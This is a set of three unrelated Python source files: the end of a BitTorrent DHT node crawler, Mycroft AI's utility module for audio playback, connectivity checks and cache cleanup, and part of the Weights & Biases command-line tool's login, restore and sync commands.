if not self.hasNode(node["id"], node["host"], node["port"])\
and id != self.id:
self.nodePool[id].append(node)
else:
self.duplicates += 1
self.total += 1
pass
def hasNode(self, id, host, port):
r = None
for n in self.nodePool[id]:
if n["host"] == host and n["port"] == port:
r = n
break
return r
def serialize(self):
obj = {}
for k, nlist in self.nodePool.items():
for v in nlist:
addr = (v['host'], v['port'])
if addr in self.addrPool:
v["rtt"] = self.addrPool[addr]["timestamp"]- v["timestamp"]
obj[k] = obj.get(k, []) + [v]
timestamp = time.strftime("%Y%m%d%H%M%S")
f = open("nodes.%s.%s" % (timestamp, str(intify(self.id))), "w")
pickle.Pickler(f).dump(obj)
f.close()
pass
def start_listener(self):
while self.counter:
try:
msg, addr = self.isock.recvfrom(PACKET_LEN)
msgTID, msgType, msgContent = self.krpc.decodeRsp(msg)
if "nodes" in msgContent:
self.processNodes(unpackNodes(msgContent["nodes"]))
self.addrPool[addr] = {"timestamp":time.time()}
self.respondent += 1
except Exception, err:
print "Exception:Crawler.listener():", err
pass
def start_sender(self):
while self.counter:
try:
node = self.nodeQueue.get(True)
if (distance(self.id, node["id"])>>148)==0:
self.findNode(node["host"], node["port"], node["id"])
for i in range(1,5):
tid = stringify(intify(node["id"]) ^ (2**(i*3) - 1))
self.findNode(node["host"], node["port"], tid)
# This threshold can be tuned, maybe use self.respondent
elif self.tn < 2000:
self.findNode(node["host"], node["port"], self.id)
except Exception, err:
print "Exception:Crawler.start_sender()", err, node
pass
def start_crawl(self):
t1 = threading.Thread(target=self.start_listener, args=())
t1.daemon = True
t1.start()
t2 = threading.Thread(target=self.start_sender, args=())
t2.daemon = True
t2.start()
while self.counter:
try:
self.counter = CTTIME if self.nodeQueue.qsize() else self.counter-1
self.info()
time.sleep(1)
except KeyboardInterrupt:
break
except Exception, err:
print "Exception:Crawler.start_crawl()", err
pass
def info(self):
print "[NodeSet]:%i\t\t[12-bit Zone]:%i [%i/s]\t\t[Response]:%.2f%%\t\t[Queue]:%i\t\t[Dup]:%.2f%%" % \
(len(self.nodePool), self.tn, self.tnspeed,
self.respondent*100.0/max(1,len(self.nodePool)),
self.nodeQueue.qsize(), self.duplicates*100.0/self.total)
pass
def convergeSpeed(self,node):
if (distance(self.id, node["id"])>>148)==0:
self.tn += 1
if (time.time()-self.tntold) >= 5:
self.tnspeed = int((self.tn-self.tnold)/(time.time()-self.tntold))
self.tnold = self.tn
self.tntold = time.time()
pass
if __name__=="__main__":
now = time.time()
id = stringify(int(sys.argv[1])) if len(sys.argv)>1 else newID()
crawler = Crawler(id)
# Try to load local node cache
try:
if os.path.exists("nodecache"):
nl = pickle.load(open("nodecache","r"))
for n in nl:
n["timestamp"] = time.time()
n["rtt"] = float('inf')
crawler.nodeQueue.put(n)
except:
pass
# Try to get bootstrap nodes from official router
crawler.findNode("router.bittorrent.com", 6881, crawler.id)
crawler.start_crawl()
print "%.2f minutes" % ((time.time() - now)/60.0)
crawler.serialize()
pass
|
__init__.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re
import socket
import subprocess
from os.path import join, expanduser
from threading import Thread
from time import sleep
import json
import os.path
import tempfile
import psutil
from stat import S_ISREG, ST_MTIME, ST_MODE, ST_SIZE
import requests
import signal as sig
import mycroft.audio
import mycroft.configuration
from mycroft.util.format import nice_number
# Officially exported methods from this file:
# play_wav, play_mp3, play_ogg, get_cache_directory,
# resolve_resource_file, wait_while_speaking
from mycroft.util.log import LOG
from mycroft.util.parse import extract_datetime, extract_number, normalize
from mycroft.util.signal import *
def resolve_resource_file(res_name):
"""Convert a resource into an absolute filename.
Resource names are in the form: 'filename.ext'
or 'path/filename.ext'
The system will look for ~/.mycroft/res_name first, and
if not found will look at /opt/basilisk/res_name,
then finally it will look for res_name in the 'mycroft/res'
folder of the source code package.
Example:
With mycroft running as the user 'bob', if you called
resolve_resource_file('snd/beep.wav')
it would return either '/home/bob/.mycroft/snd/beep.wav' or
'/opt/basilisk/snd/beep.wav' or '.../mycroft/res/snd/beep.wav',
where the '...' is replaced by the path where the package has
been installed.
Args:
res_name (str): a resource path/name
"""
config = mycroft.configuration.Configuration.get()
# First look for fully qualified file (e.g. a user setting)
if os.path.isfile(res_name):
return res_name
# Now look for ~/.mycroft/res_name (in user folder)
filename = os.path.expanduser("~/.mycroft/" + res_name)
if os.path.isfile(filename):
return filename
# Next look for /opt/basilisk/res/res_name
data_dir = expanduser(config['data_dir'])
filename = os.path.expanduser(join(data_dir, res_name))
if os.path.isfile(filename):
return filename
# Finally look for it in the source package
filename = os.path.join(os.path.dirname(__file__), '..', 'res', res_name)
filename = os.path.abspath(os.path.normpath(filename))
if os.path.isfile(filename):
return filename
return None # Resource cannot be resolved
def play_wav(uri):
""" Play a wav-file.
This will use the application specified in the mycroft config
and play the uri passed as argument. The function will return directly
and play the file in the background.
Arguments:
uri: uri to play
Returns: subprocess.Popen object
"""
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_wav_cmdline")
play_wav_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_wav_cmd):
if cmd == "%1":
play_wav_cmd[index] = (get_http(uri))
return subprocess.Popen(play_wav_cmd)
def play_mp3(uri):
""" Play a mp3-file.
This will use the application specified in the mycroft config
and play the uri passed as argument. The function will return directly
and play the file in the background.
Arguments:
uri: uri to play
Returns: subprocess.Popen object
"""
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_mp3_cmdline")
play_mp3_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_mp3_cmd):
if cmd == "%1":
play_mp3_cmd[index] = (get_http(uri))
return subprocess.Popen(play_mp3_cmd)
def play_ogg(uri):
""" Play a ogg-file.
This will use the application specified in the mycroft config
and play the uri passed as argument. The function will return directly
and play the file in the background.
Arguments:
uri: uri to play
Returns: subprocess.Popen object
"""
config = mycroft.configuration.Configuration.get()
play_cmd = config.get("play_ogg_cmdline")
play_ogg_cmd = str(play_cmd).split(" ")
for index, cmd in enumerate(play_ogg_cmd):
if cmd == "%1":
play_ogg_cmd[index] = (get_http(uri))
return subprocess.Popen(play_ogg_cmd)
def record(file_path, duration, rate, channels):
if duration > 0:
return subprocess.Popen(
["arecord", "-r", str(rate), "-c", str(channels), "-d",
str(duration), file_path])
else:
return subprocess.Popen(
["arecord", "-r", str(rate), "-c", str(channels), file_path])
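# Usage sketch (illustrative; the path is hypothetical): record() simply shells
# out to `arecord`, so a ten second, 16 kHz mono capture would look like:
#
#   proc = record('/tmp/test_recording.wav', duration=10, rate=16000, channels=1)
#   proc.wait()   # record() returns the subprocess.Popen object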
def get_http(uri):
return uri.replace("https://", "http://")
def remove_last_slash(url):
if url and url.endswith('/'):
url = url[:-1]
return url
def read_stripped_lines(filename):
with open(filename, 'r') as f:
return [line.strip() for line in f]
def read_dict(filename, div='='):
d = {}
with open(filename, 'r') as f:
for line in f:
(key, val) = line.split(div)
d[key.strip()] = val.strip()
return d
def connected():
""" Check connection by connecting to 8.8.8.8, if this is
blocked/fails, Microsoft NCSI is used as a backup
Returns:
True if internet connection can be detected
"""
return connected_dns() or connected_ncsi()
def connected_ncsi():
""" Check internet connection by retrieving the Microsoft NCSI endpoint.
Returns:
True if internet connection can be detected
"""
try:
r = requests.get('http://www.msftncsi.com/ncsi.txt')
if r.text == u'Microsoft NCSI':
return True
except Exception:
pass
return False
def connected_dns(host="8.8.8.8", port=53, timeout=3):
""" Check internet connection by connecting to DNS servers
Returns:
True if internet connection can be detected
"""
# Thanks to 7h3rAm on
# Host: 8.8.8.8 (google-public-dns-a.google.com)
# OpenPort: 53/tcp
# Service: domain (DNS/TCP)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((host, port))
return True
except IOError:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect(("8.8.4.4", port))
return True
except IOError:
return False
def curate_cache(directory, min_free_percent=5.0, min_free_disk=50):
"""Clear out the directory if needed
This assumes all the files in the directory can be deleted freely
Args:
directory (str): directory path that holds cached files
min_free_percent (float): percentage (0.0-100.0) of drive to keep free,
default is 5% if not specified.
min_free_disk (float): minimum allowed disk space in MB, default
value is 50 MB if not specified.
"""
# Simpleminded implementation -- keep a certain percentage of the
# disk available.
# TODO: Would be easy to add more options, like whitelisted files, etc.
space = psutil.disk_usage(directory)
# convert from MB to bytes
min_free_disk *= 1024 * 1024
# space.percent = space.used/space.total*100.0
percent_free = 100.0 - space.percent
if percent_free < min_free_percent and space.free < min_free_disk:
LOG.info('Low diskspace detected, cleaning cache')
# calculate how many bytes we need to delete
bytes_needed = (min_free_percent - percent_free) / 100.0 * space.total
bytes_needed = int(bytes_needed + 1.0)
# get all entries in the directory w/ stats
entries = (os.path.join(directory, fn) for fn in os.listdir(directory))
entries = ((os.stat(path), path) for path in entries)
# leave only regular files, insert modification date
entries = ((stat[ST_MTIME], stat[ST_SIZE], path)
for stat, path in entries if S_ISREG(stat[ST_MODE]))
# delete files with oldest modification date until space is freed
space_freed = 0
for moddate, fsize, path in sorted(entries):
try:
os.remove(path)
space_freed += fsize
except Exception:
pass
if space_freed > bytes_needed:
return # deleted enough!
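# Worked example of the clean-up math above (numbers are illustrative): on a
# 1 GB cache volume with only 3% (~30 MB) free, both triggers fire (free space
# is under min_free_percent=5.0 and under min_free_disk=50 MB), and
# bytes_needed = (5.0 - 3.0) / 100 * 1 GB ≈ 20 MB, so the oldest regular files
# are deleted until roughly that much space has been freed.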
def get_cache_directory(domain=None):
"""Get a directory for caching data
This directory can be used to hold temporary caches of data to
speed up performance. This directory will likely be part of a
small RAM disk and may be cleared at any time. So code that
uses these cached files must be able to fallback and regenerate
the file.
Args:
domain (str): The cache domain. Basically just a subdirectory.
Return:
str: a path to the directory where you can cache data
"""
config = mycroft.configuration.Configuration.get()
dir = config.get("cache_path")
if not dir:
# If not defined, use /tmp/mycroft/cache
dir = os.path.join(tempfile.gettempdir(), "mycroft", "cache")
return ensure_directory_exists(dir, domain)
def validate_param(value, name):
if not value:
raise ValueError("Missing or empty %s in mycroft.conf " % name)
def is_speaking():
"""Determine if Text to Speech is occurring
Returns:
bool: True while still speaking
"""
LOG.info("mycroft.utils.is_speaking() is deprecated, use "
"mycroft.audio.is_speaking() instead.")
return mycroft.audio.is_speaking()
def wait_while_speaking():
"""Pause as long as Text to Speech is still happening
Pause while Text to Speech is still happening. This always pauses
briefly to ensure that any preceding request to speak has time to
begin.
"""
LOG.info("mycroft.utils.wait_while_speaking() is deprecated, use "
"mycroft.audio.wait_while_speaking() instead.")
return mycroft.audio.wait_while_speaking()
def stop_speaking():
# TODO: Less hacky approach to this once Audio Manager is implemented
# Skills should only be able to stop speech they've initiated
LOG.info("mycroft.utils.stop_speaking() is deprecated, use "
"mycroft.audio.stop_speaking() instead.")
mycroft.audio.stop_speaking()
def get_arch():
""" Get architecture string of system. """
return os.uname()[4]
def reset_sigint_handler():
"""
Reset the sigint handler to the default. This fixes KeyboardInterrupt
not getting raised when started via start-mycroft.sh
"""
sig.signal(sig.SIGINT, sig.default_int_handler)
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received"""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
def create_echo_function(name, whitelist=None):
from mycroft.configuration import Configuration
blacklist = Configuration.get().get("ignore_logs")
def echo(message):
"""Listen for messages and echo them for logging"""
try:
js_msg = json.loads(message)
if whitelist and js_msg.get("type") not in whitelist:
return
if blacklist and js_msg.get("type") in blacklist:
return
if js_msg.get("type") == "registration":
# do not log tokens from registration messages
js_msg["data"]["token"] = None
message = json.dumps(js_msg)
except Exception:
pass
LOG(name).debug(message)
return echo
def camel_case_split(identifier: str) -> str:
"""Split camel case string"""
regex = '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)'
matches = re.finditer(regex, identifier)
return ' '.join([m.group(0) for m in matches])
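# Example (not part of the original module):
#   camel_case_split("HelloWorldHTTPServer")   # -> 'Hello World HTTP Server'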
|
cli.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import click
import copy
from functools import wraps
import glob
import io
import json
import logging
import netrc
import os
import random
import re
import requests
import shlex
import signal
import socket
import stat
import subprocess
import sys
import textwrap
import time
import traceback
import yaml
import threading
import random
import platform
import datetime
import shutil
# pycreds has a find_executable that works in windows
from dockerpycreds.utils import find_executable
from wandb import util
from click.utils import LazyFile
from click.exceptions import BadParameter, ClickException, Abort
# whaaaaat depends on prompt_toolkit < 2, ipython now uses > 2 so we vendored for now
# DANGER this changes the sys.path so we should never do this in a user script
whaaaaat = util.vendor_import("whaaaaat")
import six
from six.moves import BaseHTTPServer, urllib, configparser
import socket
from .core import termlog
import wandb
from wandb.apis import InternalApi
from wandb.wandb_config import Config
from wandb import wandb_agent
from wandb import wandb_controller
from wandb import env
from wandb import wandb_run
from wandb import wandb_dir
from wandb import run_manager
from wandb import Error
from wandb.magic_impl import magic_install
DOCS_URL = 'http://docs.wandb.com/'
logger = logging.getLogger(__name__)
class ClickWandbException(ClickException):
def format_message(self):
log_file = util.get_log_file_path()
orig_type = '{}.{}'.format(self.orig_type.__module__,
self.orig_type.__name__)
if issubclass(self.orig_type, Error):
return click.style(str(self.message), fg="red")
else:
return ('An Exception was raised, see %s for full traceback.\n'
'%s: %s' % (log_file, orig_type, self.message))
class CallbackHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Simple callback handler that stores query string parameters and
shuts down the server.
"""
def do_GET(self):
self.server.result = urllib.parse.parse_qs(
self.path.split("?")[-1])
self.send_response(200)
self.end_headers()
self.wfile.write(b'Success')
self.server.stop()
def log_message(self, format, *args):
pass
class LocalServer():
"""A local HTTP server that finds an open port and listens for a callback.
The urlencoded callback url is accessed via `.qs()`; the query parameters passed
to the callback are accessed via `.result`.
"""
def __init__(self):
self.blocking = True
self.port = 8666
self.connect()
self._server.result = {}
self._server.stop = self.stop
def connect(self, attempts=1):
try:
self._server = BaseHTTPServer.HTTPServer(
('127.0.0.1', self.port), CallbackHandler)
except socket.error:
if attempts < 5:
self.port += random.randint(1, 1000)
self.connect(attempts + 1)
else:
logging.info(
"Unable to start local server, proceeding manually")
class FakeServer():
def serve_forever(self):
pass
self._server = FakeServer()
def qs(self):
return urllib.parse.urlencode({
"callback": "http://127.0.0.1:{}/callback".format(self.port)})
@property
def result(self):
return self._server.result
def start(self, blocking=True):
self.blocking = blocking
if self.blocking:
self._server.serve_forever()
else:
t = threading.Thread(target=self._server.serve_forever)
t.daemon = True
t.start()
def stop(self, *args):
t = threading.Thread(target=self._server.shutdown)
t.daemon = True
t.start()
if not self.blocking:
os.kill(os.getpid(), signal.SIGINT)
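# Minimal usage sketch (illustrative, not part of the original CLI): LocalServer
# serves a one-shot callback endpoint and exposes the received query string.
#
#   server = LocalServer()
#   server.qs()                    # e.g. 'callback=http%3A%2F%2F127.0.0.1%3A8666%2Fcallback'
#   server.start(blocking=False)   # serve_forever() in a daemon thread
#   ...                            # direct the browser flow at the callback URL
#   server.result                  # query parameters parsed by CallbackHandler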
def display_error(func):
"""Function decorator for catching common errors and re-raising as wandb.Error"""
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except wandb.Error as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(
exc_type, exc_value, exc_traceback)
logger.error(''.join(lines))
click_exc = ClickWandbException(e)
click_exc.orig_type = exc_type
six.reraise(ClickWandbException, click_exc, sys.exc_info()[2])
return wrapper
def prompt_for_project(ctx, entity):
"""Ask the user for a project, creating one if necessary."""
result = ctx.invoke(projects, entity=entity, display=False)
try:
if len(result) == 0:
project = click.prompt("Enter a name for your first project")
#description = editor()
project = api.upsert_project(project, entity=entity)["name"]
else:
project_names = [project["name"] for project in result]
question = {
'type': 'list',
'name': 'project_name',
'message': "Which project should we use?",
'choices': project_names + ["Create New"]
}
result = whaaaaat.prompt([question])
if result:
project = result['project_name']
else:
project = "Create New"
# TODO: check with the server if the project exists
if project == "Create New":
project = click.prompt(
"Enter a name for your new project", value_proc=api.format_project)
#description = editor()
project = api.upsert_project(project, entity=entity)["name"]
except wandb.apis.CommError as e:
raise ClickException(str(e))
return project
def editor(content='', marker='# Enter a description, markdown is allowed!\n'):
message = click.edit(content + '\n\n' + marker)
if message is not None:
return message.split(marker, 1)[0].rstrip('\n')
api = InternalApi()
# Some commands take project/entity etc. as arguments. We provide default
# values for those arguments from the current project configuration, as
# returned by api.settings()
CONTEXT = dict(default_map=api.settings())
class RunGroup(click.Group):
@display_error
def get_command(self, ctx, cmd_name):
# TODO: check if cmd_name is a file in the current dir and not require `run`?
rv = click.Group.get_command(self, ctx, cmd_name)
if rv is not None:
return rv
return None
@click.command(cls=RunGroup, invoke_without_command=True)
@click.version_option(version=wandb.__version__)
@click.pass_context
def cli(ctx):
"""Weights & Biases.
Run "wandb docs" for full documentation.
"""
wandb.try_to_set_up_global_logging()
if ctx.invoked_subcommand is None:
click.echo(ctx.get_help())
@cli.command(context_settings=CONTEXT, help="List projects")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def projects(entity, display=True):
projects = api.list_projects(entity=entity)
if len(projects) == 0:
message = "No projects found for %s" % entity
else:
message = 'Latest projects for "%s"' % entity
if display:
click.echo(click.style(message, bold=True))
for project in projects:
click.echo("".join(
(click.style(project['name'], fg="blue", bold=True),
" - ",
str(project['description'] or "").split("\n")[0])
))
return projects
@cli.command(context_settings=CONTEXT, help="List runs in a project")
@click.pass_context
@click.option("--project", "-p", default=None, envvar=env.PROJECT, help="The project you wish to list runs from.")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def runs(ctx, project, entity):
click.echo(click.style('Latest runs for project "%s"' %
project, bold=True))
if project is None:
project = prompt_for_project(ctx, project)
runs = api.list_runs(project, entity=entity)
for run in runs:
click.echo("".join(
(click.style(run['name'], fg="blue", bold=True),
" - ",
(run['description'] or "").split("\n")[0])
))
@cli.command(context_settings=CONTEXT, help="List local & remote file status")
@click.argument("run", envvar=env.RUN_ID)
@click.option("--settings/--no-settings", help="Show the current settings", default=True)
@display_error
def status(run, settings):
logged_in = bool(api.api_key)
if not os.path.isdir(wandb_dir()):
if logged_in:
msg = "Directory not initialized. Please run %s to get started." % click.style(
"wandb init", bold=True)
else:
msg = "You are not logged in. Please run %s to get started." % click.style(
"wandb login", bold=True)
termlog(msg)
elif settings:
click.echo(click.style("Logged in?", bold=True) + " %s" % logged_in)
click.echo(click.style("Current Settings", bold=True))
settings = api.settings()
click.echo(json.dumps(
settings,
sort_keys=True,
indent=2,
separators=(',', ': ')
))
@cli.command(context_settings=CONTEXT, help="Restore code, config and docker state for a run")
@click.pass_context
@click.argument("run", envvar=env.RUN_ID)
@click.option("--no-git", is_flag=True, default=False, help="Skip git checkout/restore")
@click.option("--branch/--no-branch", default=True, help="Whether to create a branch or checkout detached")
@click.option("--project", "-p", envvar=env.PROJECT, help="The project you wish to upload to.")
@click.option("--entity", "-e", envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def restore(ctx, run, no_git, branch, project, entity):
if ":" in run:
if "/" in run:
entity, rest = run.split("/", 1)
else:
rest = run
project, run = rest.split(":", 1)
elif run.count("/") > 1:
entity, run = run.split("/", 1)
project, run = api.parse_slug(run, project=project)
commit, json_config, patch_content, metadata = api.run_config(
project, run=run, entity=entity)
repo = metadata.get("git", {}).get("repo")
image = metadata.get("docker")
RESTORE_MESSAGE = """`wandb restore` needs to be run from the same git repository as the original run.
Run `git clone %s` and restore from there or pass the --no-git flag.""" % repo
if no_git:
commit = None
elif not api.git.enabled:
if repo:
raise ClickException(RESTORE_MESSAGE)
elif image:
wandb.termlog("Original run has no git history. Just restoring config and docker")
if commit and api.git.enabled:
subprocess.check_call(['git', 'fetch', '--all'])
try:
api.git.repo.commit(commit)
except ValueError:
wandb.termlog("Couldn't find original commit: {}".format(commit))
commit = None
files = api.download_urls(project, run=run, entity=entity)
for filename in files:
if filename.startswith('upstream_diff_') and filename.endswith('.patch'):
commit = filename[len('upstream_diff_'):-len('.patch')]
try:
api.git.repo.commit(commit)
except ValueError:
commit = None
else:
break
if commit:
wandb.termlog(
"Falling back to upstream commit: {}".format(commit))
patch_path, _ = api.download_write_file(files[filename])
else:
raise ClickException(RESTORE_MESSAGE)
else:
if patch_content:
patch_path = os.path.join(wandb.wandb_dir(), 'diff.patch')
with open(patch_path, "w") as f:
f.write(patch_content)
else:
patch_path = None
branch_name = "wandb/%s" % run
if branch and branch_name not in api.git.repo.branches:
api.git.repo.git.checkout(commit, b=branch_name)
wandb.termlog("Created branch %s" %
click.style(branch_name, bold=True))
elif branch:
wandb.termlog(
"Using existing branch, run `git branch -D %s` from master for a clean checkout" % branch_name)
api.git.repo.git.checkout(branch_name)
else:
wandb.termlog("Checking out %s in detached mode" % commit)
api.git.repo.git.checkout(commit)
if patch_path:
# we apply the patch from the repository root so git doesn't exclude
# things outside the current directory
root = api.git.root
patch_rel_path = os.path.relpath(patch_path, start=root)
# --reject is necessary or else this fails any time a binary file
# occurs in the diff
# we use .call() instead of .check_call() for the same reason
# TODO(adrian): this means there is no error checking here
subprocess.call(['git', 'apply', '--reject',
patch_rel_path], cwd=root)
wandb.termlog("Applied patch")
# TODO: we should likely respect WANDB_DIR here.
util.mkdir_exists_ok("wandb")
config = Config(run_dir="wandb")
config.load_json(json_config)
config.persist()
wandb.termlog("Restored config variables to %s" % config._config_path())
if image:
if not metadata["program"].startswith("<") and metadata.get("args") is not None:
# TODO: we may not want to default to python here.
runner = util.find_runner(metadata["program"]) or ["python"]
command = runner + [metadata["program"]] + metadata["args"]
cmd = " ".join(command)
else:
wandb.termlog("Couldn't find original command, just restoring environment")
cmd = None
wandb.termlog("Docker image found, attempting to start")
ctx.invoke(docker, docker_run_args=[image], cmd=cmd)
return commit, json_config, patch_content, repo, metadata
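# Illustrative, standalone sketch of the run-spec parsing performed by `restore` above.
# Not part of the CLI; the helper name is hypothetical and exists only for clarity.
def _parse_run_spec_example(run, entity=None, project=None):
    """Accepts "run_id", "project:run_id", "entity/project:run_id" or "entity/project/run_id"."""
    if ":" in run:
        if "/" in run:
            entity, rest = run.split("/", 1)
        else:
            rest = run
        project, run = rest.split(":", 1)
    elif run.count("/") > 1:
        # "entity/project/run_id": peel off the entity, the rest is handled by api.parse_slug
        entity, run = run.split("/", 1)
    return entity, project, run
# e.g. _parse_run_spec_example("acme/mnist:abc123") -> ("acme", "mnist", "abc123")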
@cli.command(context_settings=CONTEXT, help="Upload an offline training directory to W&B")
@click.pass_context
@click.argument("path", nargs=-1, type=click.Path(exists=True))
@click.option("--id", envvar=env.RUN_ID, help="The run you want to upload to.")
@click.option("--project", "-p", envvar=env.PROJECT, help="The project you want to upload to.")
@click.option("--entity", "-e", envvar=env.ENTITY, help="The entity to scope to.")
@click.option("--ignore", help="A comma seperated list of globs to ignore syncing with wandb.")
@display_error
def sync(ctx, path, id, project, entity, ignore):
if api.api_key is None:
ctx.invoke(login)
if ignore:
globs = ignore.split(",")
else:
globs = None
path = path[0] if len(path) > 0 else os.getcwd()
if os.path.isfile(path):
raise ClickException("path must be a directory")
wandb_dir = os.path.join(path, "wandb")
run_paths = glob.glob(os.path.join(wandb_dir, "*run-*"))
if len(run_paths) == 0:
run_paths = glob.glob(os.path.join(path, "*run-*"))
if len(run_paths) > 0:
for run_path in run_paths:
wandb_run.Run.from_directory(run_path,
run_id=run_path.split("-")[-1], project=project, entity=entity, ignore_globs=globs)
else:
wandb_run.Run.from_directory(
path, run_id=id, project=project, entity=entity, ignore_globs=globs)
@cli.command(context_settings=CONTEXT, help="Pull files from Weights & Biases")
@click.argument("run", envvar=env.RUN_ID)
@click.option("--project", "-p", envvar=env.PROJECT, help="The project you want to download.")
@click.option("--entity", "-e", default="models", envvar=env.ENTITY, help="The entity to scope the listing to.")
@display_error
def pull(run, project, entity):
project, run = api.parse_slug(run, project=project)
urls = api.download_urls(project, run=run, entity=entity)
if len(urls) == 0:
raise ClickException("Run has no files")
click.echo("Downloading: {project}/{run}".format(
project=click.style(project, bold=True), run=run
))
for name in urls:
if api.file_current(name, urls[name]['md5']):
click.echo("File %s is up to date" % name)
else:
length, response = api.download_file(urls[name]['url'])
# TODO: I had to add this because some versions in CI broke click.progressbar
sys.stdout.write("File %s\r" % name)
dirname = os.path.dirname(name)
if dirname != '':
wandb.util.mkdir_exists_ok(dirname)
with click.progressbar(length=length, label='File %s' % name,
fill_char=click.style('&', fg='green')) as bar:
with open(name, "wb") as f:
for data in response.iter_content(chunk_size=4096):
f.write(data)
bar.update(len(data))
@cli.command(context_settings=CONTEXT, help="Login to Weights & Biases")
@click.argument("key", nargs=-1)
@click.option("--host", default=None, help="Login to a specific instance of W&B")
@click.option("--browser/--no-browser", default=True, help="Attempt to launch a browser for login")
@click.option("--anonymously", is_flag=True, help="Log in anonymously")
@display_error
def login(key, host, anonymously, server=LocalServer(), browser=True, no_offline=False):
global api
if host == "https://api.wandb.ai":
api.clear_setting("base_url", globally=True)
elif host:
if not host.startswith("http"):
raise ClickException("host must start with http(s)://")
api.set_setting("base_url", host, globally=True)
key = key[0] if len(key) > 0 else None
# Import in here for performance reasons
import webbrowser
browser = util.launch_browser(browser)
def get_api_key_from_browser(signup=False):
if not browser:
return None
query = '?signup=true' if signup else ''
webbrowser.open_new_tab('{}/authorize{}'.format(api.app_url, query))
#Getting rid of the server for now. We would need to catch Abort from server.stop and deal accordingly
#server.start(blocking=False)
#if server.result.get("key"):
# return server.result["key"][0]
return None
if key:
util.set_api_key(api, key)
else:
if anonymously:
os.environ[env.ANONYMOUS] = "must"
# Don't allow signups or dryrun for local
        local = host is not None and host != "https://api.wandb.ai"
key = util.prompt_api_key(api, input_callback=click.prompt,
browser_callback=get_api_key_from_browser, no_offline=no_offline, local=local)
if key:
api.clear_setting('disabled')
click.secho("Successfully logged in to Weights & Biases!", fg="green")
elif not no_offline:
api.set_setting('disabled', 'true')
click.echo("Disabling Weights & Biases. Run 'wandb login' again to re-enable.")
# reinitialize API to create the new client
api = InternalApi()
return key
@cli.command(context_settings=CONTEXT, help="Configure a directory with Weights & Biases")
@click.pass_context
@display_error
def init(ctx):
from wandb import _set_stage_dir, __stage_dir__, wandb_dir
if __stage_dir__ is None:
_set_stage_dir('wandb')
if os.path.isdir(wandb_dir()) and os.path.exists(os.path.join(wandb_dir(), "settings")):
click.confirm(click.style(
"This directory has been configured previously, should we re-configure it?", bold=True), abort=True)
else:
click.echo(click.style(
"Let's setup this directory for W&B!", fg="green", bold=True))
if api.api_key is None:
ctx.invoke(login)
viewer = api.viewer()
# Viewer can be `None` in case your API information became invalid, or
# in testing if you switch hosts.
if not viewer:
click.echo(click.style(
"Your login information seems to be invalid: can you log in again please?", fg="red", bold=True))
ctx.invoke(login)
# This shouldn't happen.
viewer = api.viewer()
if not viewer:
click.echo(click.style(
"We're sorry, there was a problem logging you in. Please send us a note at support@wandb.com and tell us how this happened.", fg="red", bold=True))
sys.exit(1)
# At this point we should be logged in successfully.
if len(viewer["teams"]["edges"]) > 1:
team_names = [e["node"]["name"] for e in viewer["teams"]["edges"]]
question = {
'type': 'list',
'name': 'team_name',
'message': "Which team should we use?",
'choices': team_names + ["Manual Entry"]
}
result = whaaaaat.prompt([question])
# result can be empty on click
if result:
entity = result['team_name']
else:
entity = "Manual Entry"
if entity == "Manual Entry":
entity = click.prompt("Enter the name of the team you want to use")
else:
entity = click.prompt("What username or team should we use?",
default=viewer.get('entity', 'models'))
# TODO: this error handling sucks and the output isn't pretty
try:
project = prompt_for_project(ctx, entity)
except wandb.cli.ClickWandbException:
raise ClickException('Could not find team: %s' % entity)
api.set_setting('entity', entity)
api.set_setting('project', project)
api.set_setting('base_url', api.settings().get('base_url'))
util.mkdir_exists_ok(wandb_dir())
with open(os.path.join(wandb_dir(), '.gitignore'), "w") as file:
file.write("*\n!settings")
click.echo(click.style("This directory is configured! Next, track a run:\n", fg="green") +
textwrap.dedent("""\
* In your training script:
{code1}
{code2}
* then `{run}`.
""").format(
code1=click.style("import wandb", bold=True),
code2=click.style("wandb.init(project=\"%s\")" % project, bold=True),
run=click.style("python <train.py>", bold=True),
# saving this here so I can easily put it back when we re-enable
# push/pull
# """
# * Run `{push}` to manually add a file.
# * Pull popular models into your project with: `{pull}`.
# """
# push=click.style("wandb push run_id weights.h5", bold=True),
# pull=click.style("wandb pull models/inception-v4", bold=True)
))
@cli.command(context_settings=CONTEXT, help="Open documentation in a browser")
@click.pass_context
@display_error
def docs(ctx):
import webbrowser
if util.launch_browser():
launched = webbrowser.open_new_tab(DOCS_URL)
else:
launched = False
if launched:
click.echo(click.style(
"Opening %s in your default browser" % DOCS_URL, fg="green"))
else:
click.echo(click.style(
"You can find our documentation here: %s" % DOCS_URL, fg="green"))
@cli.command("on", help="Ensure W&B is enabled in this directory")
@display_error
def on():
wandb.ensure_configured()
api = InternalApi()
try:
api.clear_setting('disabled')
except configparser.Error:
pass
click.echo(
"W&B enabled, running your script from this directory will now sync to the cloud.")
@cli.command("off", help="Disable W&B in this directory, useful for testing")
